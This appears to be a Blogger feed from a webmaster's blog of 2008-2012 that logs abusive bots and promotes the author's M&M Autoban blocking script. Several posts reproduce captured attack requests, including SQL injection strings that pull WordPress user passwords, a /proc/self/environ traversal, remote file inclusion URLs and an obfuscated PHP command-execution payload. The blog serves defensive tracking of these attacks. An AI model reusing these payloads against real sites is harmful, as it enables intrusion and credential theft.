tag:blogger.com,1999:blog-339232182016-02-17T16:27:10.867-06:00Web RobotsWeb robots are visiting sites to hack, spam, email harvest and to scrap your website contect for profit.
This blog is an atempt to keep track of them and to help webmasters by listing the abuse in google.<a href="http://feeds.feedburner.com/WebRobots" title="Subscribe to my feed, Web Robots" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" /></a>tmasternoreply@blogger.comBlogger193125tag:blogger.com,1999:blog-33923218.post-80085345378631900452012-03-30T16:38:00.000-05:002012-03-30T16:39:21.070-05:00New uploadM&M autobam v4.8 has been uploaded. This version adds country ban by ip<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-54961503598503768722011-12-16T10:59:00.005-06:002011-12-16T14:01:31.866-06:00webmasters how to disable google relatedFrom :http://www.lunarlog.com/google-related-privacy/<br />Reposting: I have not been able to find a way to disable Google related if you have not seen it you had better check out whats showing up on your website.<br /><a target='_blank' title='ImageShack - Image And Video Hosting' href='http://imageshack.us/photo/my-images/694/instawaresrelated.gif/'><img src='http://img694.imageshack.us/img694/6661/instawaresrelated.gif' border='0'/></a><br /><br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br /><blockquote>Google Related Program and My Privacy Issues<br /><br />I spent the last couple of weeks updating my main website Lunarstudio - mostly reprogramming and adding new images. When updating websites, most responsible webmasters and designers will run their site through additional browsers, operating systems, and test people’s reactions to new content. I had a friend look at my site on Sunday to see if she had any feedback. Out of the corner of my eye, I noticed a full-width bar appear at the bottom of my page on her monitor. My first reaction was “WTF”, followed by concern that somehow I must have uploaded malware to the back-end of my site. The third option which was slightly more worrisome is that some hackers got into my site. So I took a closer look, and the bottom left read “Google Related” (don’t install this.)<br /><br />Now, I would never think Google would have released a toolbar that covered up part of the screen. Not only was it distracting from the design I had worked so hard it, but it wouldn’t just affect me but almost every webmaster and designer on the planet. So my next thought that it had to be some malware she accidentally downloaded over the course of her Internet travels. Upon even closer inspection, I noticed that it was serving up advertisements and contact information from competitors. So someone looking at my site could see another image at the bottom of the screen, then decide to go to that website instead.<br /><br />I started to look into this. Sure enough, it’s part of a new, 20-day old Google program which is a toolbar extension for Internet Explorer and Chrome. ArsTechnica wrote a concise article on what Google Relate does here. While it might prove useful for some users, for webmasters and those concerned with privacy, this is an absolute nightmare. It represents a major downfall in Net Neutrality if this is allowed to carry on. *Aside* — some might argue that Google is not a telecom, Internet Provider, or government agency and hence doesn’t fall into the argument of threatening Net Neutrality. However, I should remind people that Google has mentioned that it’s testing their Internet Providing services. Also, Android runs on many cellphones as well as telecom providers. They’re basically in bed with one another.<br /><br />There’s several different and valid concerns, not to mention the legality of this program:<br /><br />1.It interferes with a person or company’s intended website design without their permission.<br />2.It potentially distracts an end-user.<br />3.It slows down a person’s website loading time. The speed issue is probably negligible, but it’s still there without an owner’s permission.<br />4.It risks having people leave your website in favor of another. Holding user retention on a landing-page is tough enough, but this just adds fuel to the fire.<br />5.Due to people wandering off one’s website, it can jeopardize website owner’s businesses and livelihoods.<br />6.Google is directly (or indirectly) profiteering from someone else’s work without their permission.<br />7.This is potentially part of their AdWords program, which makes money off of advertisements.<br />8.It allows for Google to monitor your browsing habits, even when not using Google search. It’s basically spying on your activities.<br />9.It potentially opens up the door for further abuse.<br />10.It threatens Google’s competitors (Yahoo!, Bing, and other search engines.) If successful, competitors might also have to roll out similar toolbars or methods.<br />11.It could become a permanent part of Google Chrome.<br />Now, there’s some usefulness to the end-user. It wouldn’t be fair for me to mention the Google Related negatives without the positives:<br /><br />1.Provides directions.<br />2.Provides alternative solutions for someone looking for a service or help.<br />I was almost positive Google would provide webmasters with a method to take this off of owner’s websites through the use of META tags, but my searches for that method turned up empty. Instead, I came across other “unapproved” methods of using CSS code to disable the iframe, either by moving the toolbar off-screen, or by hiding the iframe completely. Unfortunately, I tried these methods and it didn’t work. It seems that Google caught on to webmasters changing their CSS code, and in turn updated their own to prevent us from doing so.<br /><br />Since then, I’ve brought it to the attention of some friends on Facebook, however I think my concern has largely fallen on deaf ears which is understandable. I’ve also written on the Google Forum where you can see there my concern is #6. Some might call it an overreaction, but I think I’m fully justified here. The people reporting this problem is so low at the moment because Google Related is just starting to get attention. This is part of the reason why I’m writing about it on my blog — it’s to bring attention to this.<br /><br />My main issue is that Google is intruding upon my work and business without permission. The nail in the coffin is that they are also potentially profiteering without my permission too. I think it’s just a matter of time before Google is:<br /><br />1.Sued by competitors.<br />2.Department of Justice goes after them and tries to break up the monopoly.<br />3.Public outrage from the webmasters community gets out of control.<br />4.Or they disable it before it gets to any of the points listed above.<br />I hope I am overly concerned, and that Google disables their new program almost as soon as it has started. However, it blows my mind how this idea got past scores of lawyers, executives, management, and employees at a billion dollar company in the first place. If you agree with my concerns, please promote this article and also express your concern on the Google Related Forum. If you disagree, I’m still interested in hearing your views</blockquote><div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-91761771007447170532011-03-11T11:02:00.001-06:002011-03-11T11:05:19.239-06:00"Script Injections" listBots vs Browsers - has a new list of all injection atempts.<br /><br />If your keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-24920366775547273332011-03-08T08:58:00.002-06:002011-03-08T09:06:57.359-06:00mas email problemsI have just discovered that the email option of my script can trigger the mas email alarms on the free host. They use this alarnm to stop spammers.<br /><br />If your running the script on a free host you need to disable the emails until I can build a outbox system that will send merge the emails into 1 message once a day.<br /><br />go into autoban and change all mail commands to <br />//mail<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-74218424291775652262011-03-08T08:45:00.001-06:002011-03-08T08:58:23.465-06:00182.114.206.25 hn.kd.ny.adsl union injection hacker20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20-- <br /><br />from ip 182.114.206.25 hn.kd.ny.adsl<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-33945924878993550962010-08-26T15:06:00.002-05:002010-08-26T15:10:32.558-05:00as13448.com trafficMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1) <br />All Hits From static-208-80-194-34.as13448.com 208.80.194.34 <br /><br /><br />I am getting a lot of bot traffic from lots of ips on subdomains of as13448.com<br />The website as13448.com is not a ISP so all of those ips need to be blocked.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-7073265136802125862010-05-24T09:50:00.003-05:002010-05-24T11:10:54.300-05:00mylife.com privacy violations.Mylife.com is running TV advertisments and getting a lot of traffic so I checked them out and was shocked to see that when you go to the site and enter your name approx age and zip that the system will come back to you and display your XXX (private info)<br /><br />Check it out yourself and once your upset help by complaining abbout this huge privacy violation. They are helping create identity fraud.<br /><br />File a complaint here <a href="https://www.ftccomplaintassistant.gov/">https://www.ftccomplaintassistant.gov/</a><br /><br />And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. <a href="http://www.privacyrights.org/contact">http://www.privacyrights.org/contact</a><br /><br />It is likely that they will not have this information for all states. If they do display private info on you please let us know.<br /><br />Also see <a href="http://www.complaintsboard.com/bycompany/mylifecom-a123026.html">www.complaintsboard.com</a><br /><br />Also see <a href="http://www.consumeraffairs.com/online/mylife.html">http://www.consumeraffairs.com/online/mylife.html</a><br /><br /><br />Also see <a href="http://techpaul.wordpress.com/2009/03/06/just-say-no-to-mylifecom/"> Just say no to Mylife.com</a><br /><br /><blockquote>Better Business Bureau<br />This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]<br /><br />Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]<br /><br />The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]<br /></blockquote><div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-36407001611486224182010-02-07T22:08:00.002-06:002010-02-07T22:13:52.375-06:00New York spam on Road RunnerNYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 7:25pm<br />very nice blog.<br /><br />very nice blog. manhattanadmin@gmail.comNYC<br />Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam<br /><br />1 #<br /> NYC Apartments<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:44pm<br />interesting.<br /><br /><br />1 #<br /> NYC Rentals<br />nestseekers.com/Properties/Rentals/Manhattan<br />manhattanadmin@gmail.com<br />74.68.123.67 Submitted on 2010/02/06 at 5:28pm<br />very nice blog.<br /><br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67 Submitted on 2010/02/06 at 10:45am<br />good blog keep it up.<br /><br />good blog keep it up. admin@imagehosting21.comFree Image<br />Hostinghttp://www.imagehosting21.comspam<br /><br /><br />1 #<br /> Free Image Hosting<br />imagehosting21.com<br />admin@imagehosting21.com<br />74.68.123.67<br /><br /><br />Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.<br /><br /><br />Hello,<br /><br />Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not <br />actively monitor nor does Road Runner exercise editorial control over the content of any web site, <br />electronic mail transmission, mailing list, news group or other material created or accessible over <br />Road Runner services.<br /> <br /><br />If you feel that a Road Runner subscribers activities constitute harassment and have contact <br />information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease <br />and desist" contact with you. <br /><br /><br />If you receive further contact from the Road Runner subscriber after that point, or do not have <br />contact information for them: DO NOT REPLY or correspond with that person further. Please instead <br />forward all documentation to abuse@rr.com, which should include: full email headers or webserver <br />logs showing posts made on a message board or other Internet forum (these would typically be <br />obtained from the administration of that site). Logs would need to contain the following <br />information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone, <br />Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain <br />text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of <br />the message.<br /><br />Thank you for taking the time to contact Road Runner.<br /><br />- Road Runner Abuse [SM]<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-74805438056573978922009-06-30T17:57:00.002-05:002009-06-30T17:58:16.159-05:00wrangler.websitewelcome.com botAgent: -NO AGENT- <br />74.52.200.178 wrangler.websitewelcome.com <br /><br />Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address. <br /><br />websitewelcome.com added to the block list<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-33621116198798108122009-06-30T17:50:00.003-05:002009-06-30T17:55:43.828-05:00useragent spamer www.ongarofrancesco.orgAgent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK"> <br />79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it <br /><br />This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org <br /><br />This looks to be some hacker ref site. The bot is from Italy<br /><br />This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-84680107913533248142009-06-24T18:57:00.010-05:002009-07-29T12:35:58.638-05:00IE 8 breaks subdomains making them hard to read using domain highlightingDomain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.<br /><br /><a href='http://img209.imageshack.us/i/ie8c.jpg/'><img src='http://img209.imageshack.us/img209/4404/ie8c.jpg' border='0' alt='Image Hosted by ImageShack.us'/></a><br/><br /><br />This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.<br /><br />Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.<br /><br /><br />This has to be fixed.<br /><br />Microsoft is taking away our legal use of subdomains. <br />Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.<br /><br /><br />Zdnet says <a href="http://community.zdnet.co.uk/blog/0,1000000567,10008836o-2000331855b,00.htm">IE8 puts dim wits ahead of tech savvy.</a><br /><br /><a href="http://aidanwalsh.net/2008/03/on-ie8-domain-highlighting/">aidanwalsh.net</a> says <blockquote>why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL. </blockquote><br /><br /><br />domain highlighting, ie 8 domain name greayed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-6313237017208395352009-01-20T13:47:00.003-06:002009-01-20T13:55:03.494-06:00strange code on wp blog detectedmmautoban has detected the following code being used on a WP blog.<br /><br />Antyone know what this is.<br /><br />/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20<br /><br />/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20 <br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 <br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET <br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20<br /><br /><br /><br />/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20<br /><br /><br /><br />%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});} <br /><br /><br />It has about 15 other version I suspect it is some type of atack.<br />Unless some plugin is malfunctioning. <br />Anyone have any info what this code is?<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com2tag:blogger.com,1999:blog-33923218.post-9561096340874667682009-01-15T15:40:00.002-06:002009-01-15T15:44:13.321-06:00OSCommerce modsOScommerce Notes<br />===============<br />A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to <br /><br />/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order<br /><br />This generates a +select+ injection hack detection in mmautoban.<br /> To prevent this error edit your OSCommerce english.php file and change the error statement from <br />Please Select to Please Pick <br /> this will prevent customers from getting banned.<br />It is unknown if other such errors exist in other places or other programs. <br />If you see any please report them.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-87021102588391824752008-12-03T23:21:00.004-06:002008-12-03T23:27:30.401-06:00'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hackerJust detected this hacker. the ip is block by no-more-funn.moensted.dk <br /><br />What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)<br /><br />www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/* <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /> <br />www._____.com/wp-trackback.php?p=1 <br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38 <br /><br />www.____.com/xmlrpc.php<br />Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol) <br />58.241.255.38<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-66414360255684859692008-11-20T18:10:00.004-06:002008-11-20T18:21:12.552-06:00babycaleb.mvhosted.com hacker atacksBaby hacker has moved to http://babycaleb.mvhosted.com<br /><br />And his baby bots are now trying to inject this new url into websites.<br />The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.<br /><br />A search shows its infected many websites. <a href="http://www.google.com/search?q=babycaleb.mvhosted.com">http://www.google.com</a><br />Parsing input: http://babycaleb.mvhosted.com<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178<br />host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)<br />Routing details for 74.53.187.178<br />[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com<br />Using abuse net on abuse@theplanet.com<br />abuse net theplanet.com = abuse@theplanet.com<br />Using best contacts abuse@theplanet.com<br /><br /><br />Send abuse messages to theplanet.com<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-4292568379839366742008-11-12T14:31:00.002-06:002008-11-12T14:35:45.947-06:00itsapic.com/crawler.html another beta208.43.85.166<br />Required header 'Accept' missing GET / HTTP/1.0<br />User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)<br />Connection: close<br />Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx<br /><br /><br />This bot was scanning webing looking for sites and got blocked by BB so watch for it.<br />Website does not tell what its doing or ask permission to enter your site.<br /><br /><br />add to robots<br />User-agent: itsapic.com_crawler<br />Disallow: /<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-14605393276342445252008-11-08T20:31:00.014-06:002008-11-20T18:17:30.689-06:00babycaleb.fortunecity.co.uk hacker now shut down.Am getting a lot of these request lately<br /><br />/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm <br /><br />They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.<br /><br />Do not go to the website <strong>babycaleb.fortunecity.co.uk</strong> AVG detects a virus but it still gets into your system. Look for ..<br /><strong>c:\windows\system32\tools\regexe.exe</strong> <br />a <strong>trojan horse downloader.generic8.cox </strong> <br /><br />--updated-<br />The site has now been shutdown.<br /><br />A search of google <br /><a href="http://www.google.com/search?q=babycaleb.fortunecity.co.uk">http://www.google.com/search?q=babycaleb.fortunecity.co.uk</a> shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com9tag:blogger.com,1999:blog-33923218.post-1900170436259109532008-09-11T09:54:00.004-05:002008-09-11T10:15:58.740-05:00serverkompetenz.net Hackersserverkompetenz.net is a hacker not a spambot.<br /><br />.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1 <br />Agent: <PRE> $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");</pre><br /> <br />81.169.152.101 h986442.serverkompetenz.net <br /><br />Bot atempted to include some script in place of its user agent string.<br /><br />It then tried to remote load a script.<br />Blacklist Domain Ban: serverkompetenz.net <br />.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1 <br />Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank] <br />81.169.152.101 h986442.serverkompetenz.net<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-37662598401198983022008-08-22T22:49:00.000-05:002008-08-23T00:00:55.594-05:00DECLARE%20@S%20CHAR(4000);SET%20@S=CASTThe latest hack running right now is a injection atempt using a string like this.<br /><br />DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);<br /><br />This is a bot atack and is comming from everywhere. <br />The come in 2 at a time from the same IP.<br /><br />They are trying to inject some code into your site to display a iframe that will take people to another site. It doesnt look like they are atacking PHP they are atacking ASP Cold Fusion and Perl <a href="http://isc.sans.org/diary.html?storyid=4771">See more here isc.sans.org</a><br /><br />Also see this <a href="http://www.webmasterworld.com/search_engine_spiders/3725038.htm">post </a> which recomends.<br /><br /><br />RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR] <br />RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR] <br /><br />But a better page on how to block this by .htaccess is <a href="http://www.0x000000.com/?i=567">located here. </a><br /><br /><br />They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.<br /><br /><br />Just the hits will bring you server down if you try to ban all the IPS being used so I have modified the hacker modules.<br /><br />Update <a href="http://www.box.net/shared/nk40gde139">hacker modules</a> Here.<br /><br /><br /><br /><br />You will also want to download your databases and scan them for IFRAMES and java script.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com5tag:blogger.com,1999:blog-33923218.post-34950662441741815702008-08-06T09:52:00.003-05:002008-08-06T10:00:52.410-05:00magnum.liquidweb.com hackerAgent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) <br />64.91.248.2 magnum.liquidweb.com <br />string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ] <br />hacker hits with this string trying to get my server to run his scripts.<br /><br />then after geting banned keeps trying with this set of scripts.<br /><br />?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F <br />p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F<br /><br />they all are scripts used by hackers to display a test message on your server<br />http://chyngachanga.ru/content/wuge/owofi/<br />http://www.qubestunes.com/treytest/1/adoyuru/zagu/ <br />http://www.heaven-house.kz/templates_c/omoj/emuqir/<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-82086173834507462772008-06-30T23:41:00.002-05:002008-07-15T01:32:33.254-05:00After banning the domain amazonaws.com because they are hosting bots.<br />I get all of this. <br /><br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: webclient <br />75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com<br /> <br />Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727) <br />67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com <br /> <br />Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com] <br />72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com<br /> <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com<br /><br /><br />-----Update AideRSS just does not get it that they have been blocked.<br />67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com <br />[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com <br />[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com <br />[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com <br />[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com <br 